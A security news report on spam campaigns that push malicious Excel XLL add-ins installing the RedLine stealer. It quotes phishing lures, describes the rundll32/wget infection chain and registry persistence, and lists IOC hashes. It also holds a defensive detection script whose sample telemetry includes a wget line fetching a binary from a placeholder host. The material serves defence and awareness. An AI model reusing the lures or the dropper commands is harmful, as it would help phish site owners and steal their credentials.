Cybercriminals are spamming website contact forms and discussion forums to distribute Excel XLL files that download and install the RedLine password and information-stealing malware.
RedLine is an information-stealing Trojan that steals cookies, user names and passwords, and credit cards stored in web browsers, as well as FTP credentials and files from an infected device.
In addition to stealing data, RedLine can execute commands, download and run further malware, and take screenshots of the active Windows screen.
All of this data is collected and sent back to the attackers to be sold on criminal marketplaces or used for other malicious and fraudulent activity.
Spamming contact forms and discussion forums
Over the past two weeks, BleepingComputer's contact forms have been spammed numerous times with different phishing lures, including fake advertising requests, holiday gift guides, and website promotions.
After researching the lures, BleepingComputer has found this to be a widespread campaign targeting many websites that use public forums or article comment systems.
In some phishing lures seen by BleepingComputer, the threat actors have created fake websites to host the malicious Excel XLL files used to install the malware.
For example, one campaign used the following spam message and a fake website that imitated the legitimate Plutio site.
Everything you need to run your business. Manage projects, create dazzling proposals and get paid faster. Black Friday! All plans are FREE, no credit card required.
Fake Plutio website created to push malicious XLL files (Source: BleepingComputer)
Other spam messages pretend to be payment reports, requests for advertising, or gift guides with links to malicious XLL files hosted on Google Drive, as shown below.
Malicious XLL file hosted on Google Drive (Source: BleepingComputer)
Of particular interest is a lure targeting site owners with requests to advertise on their site and asking them to review the terms of the offer. This leads to a malicious 'terms.xll' file that installs the malware.
Sell us advertising space on your site from $ 500 You can read our terms at the link below https://drive.google[.]com/file/d/xxx/view?usp=sharing
Other lures seen by BleepingComputer this week are:
Thank you for using our app. Your payment has been accepted. You can see your payment report at the link below https://xxx[.]link/report.xll
Google just revealed the 100 hottest items of 2021 I received $10.000. Want it too? Read and accept the terms https://drive.google[.]com/file/d/xxx/view?usp=sharing
Abusing Excel XLL files
These spam campaigns are designed to push malicious Excel XLL files that download and install the RedLine malware on victims' Windows devices.
An XLL file is an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks.
XLL files are simply DLL files that include an 'xlAutoOpen' function, which Microsoft Excel executes when the add-in is opened.
Opening a malicious add-in in Excel (Source: BleepingComputer)
While tests conducted by BleepingComputer and security researcher TheAnalyst, with whom we discussed the attack, did not correctly load the XLL file, it may work in other versions of Microsoft Excel.
However, manually executing the DLL with the regsvr32.exe command or the 'rundll32 name.xll, xlAutoOpen' command will extract the wget.exe program to the %UserProfile% folder and use it to download the RedLine binary from a remote site.
XLL DLL downloading the RedLine malware using wget (Source: BleepingComputer)
This malicious binary is saved as %UserProfile%\JavaBridge32.exe [VirusTotal] and then executed.
A Registry autorun entry will also be created to automatically launch the RedLine information-stealer every time the victim logs into Windows.
RedLine autorun added to the Windows Registry (Source: BleepingComputer)
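The infection chain above (manual XLL load via rundll32/regsvr32, wget.exe dropped in the user profile, JavaBridge32.exe written and registered under a Run key) maps onto a few endpoint telemetry checks. The following triage script is an added example, not code from the article or from BleepingComputer; the event format, user name, paths, Run value name and download URL are constructed placeholders, while the two SHA-256 values are the ones listed in the IOC section.

```python
import re

# SHA-256 values quoted in the article's IOC section.
IOC_SHA256 = {
    "f6c06615e35798274dfa9c4b28aaa6d94220804e766e9a70c4f0dab4779ee1db": "malicious XLL",
    "626db53138176b8a371878ebaa2dbbd724be9a74f9f82ef9ebb7b7bfc0c6b2e9": "RedLine JavaBridge32.exe",
}
# Manual XLL execution via rundll32/regsvr32, or any direct call into the add-in entry point.
XLL_LOADER = re.compile(r"\b(?:rundll32|regsvr32)(?:\.exe)?\b.*(?:\.xll\b|xlAutoOpen)", re.I)
# wget.exe running out of a user profile and writing the second-stage binary.
WGET_STAGE2 = re.compile(r"\\users\\[^\\]+\\wget\.exe\b.*javabridge32\.exe", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)  # HKCU/HKLM Run persistence

def classify(ev: dict) -> list[str]:
    """Return the names of every detection that fires on a single telemetry event."""
    hits = []
    if ev.get("sha256", "").lower() in IOC_SHA256:
        hits.append("ioc_hash:" + IOC_SHA256[ev["sha256"].lower()])
    if ev["type"] == "process":
        if XLL_LOADER.search(ev["cmdline"]):
            hits.append("xll_manual_load")
        if WGET_STAGE2.search(ev["cmdline"]):
            hits.append("xll_wget_stage2")
    elif ev["type"] == "registry":
        if RUN_KEY.search(ev["key"]) and "javabridge32.exe" in ev["data"].lower():
            hits.append("redline_autorun")
    return hits

def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event id -> detections for every event that fired; clean events are omitted."""
    return {ev["id"]: h for ev in events if (h := classify(ev))}

# Constructed sample telemetry (not real captures); user, paths, value name and URL are placeholders.
SAMPLE = [
    {"id": 1, "type": "process", "cmdline": "EXCEL.EXE C:\\Users\\jo\\Q4-budget.xlsx"},
    {"id": 2, "type": "file", "path": "C:\\Users\\jo\\Downloads\\terms.xll",
     "sha256": "F6C06615E35798274DFA9C4B28AAA6D94220804E766E9A70C4F0DAB4779EE1DB"},
    {"id": 3, "type": "process", "cmdline": "rundll32 C:\\Users\\jo\\Downloads\\terms.xll,xlAutoOpen"},
    {"id": 4, "type": "process",
     "cmdline": "C:\\Users\\jo\\wget.exe -O C:\\Users\\jo\\JavaBridge32.exe http://stage2.example.invalid/x"},
    {"id": 5, "type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\JavaBridge32",
     "data": "C:\\Users\\jo\\JavaBridge32.exe"},
    {"id": 6, "type": "process", "cmdline": "regsvr32 /s C:\\Windows\\System32\\vbscript.dll"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE).items():
        print(event_id, hits)
```

Events 1 and 6 (a normal workbook open and a regsvr32 of a system DLL) stay silent, which is the point of keying the loader rule on the .xll extension and the xlAutoOpen export rather than on rundll32/regsvr32 alone.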
Once the malware is executed, it will search for valuable data to steal, including credentials and credit cards saved in the Chrome, Edge, Firefox, Brave, and Opera browsers.
If you have become a victim of this campaign, you should assume that your saved passwords are compromised and immediately change them. Additionally, if you have credit cards saved in your browsers, you should contact your credit card company to alert them of the incident.
As XLL files are executables, threat actors can use them to perform a wide range of malicious behavior on a device. Therefore, you should never open one unless it comes from a trusted source.
These files are not normally sent as attachments but are instead installed through another program or by your Windows admin.
Therefore, if you receive an email or other message distributing these types of files, simply delete the message and report it as spam.
IOCs
XLL files:
terms.xll, report.xll, terms_of_use.xll
f6c06615e35798274dfa9c4b28aaa6d94220804e766e9a70c4f0dab4779ee1db
RedLine:
JavaBridge32.exe: 626db53138176b8a371878ebaa2dbbd724be9a74f9f82ef9ebb7b7bfc0c6b2e9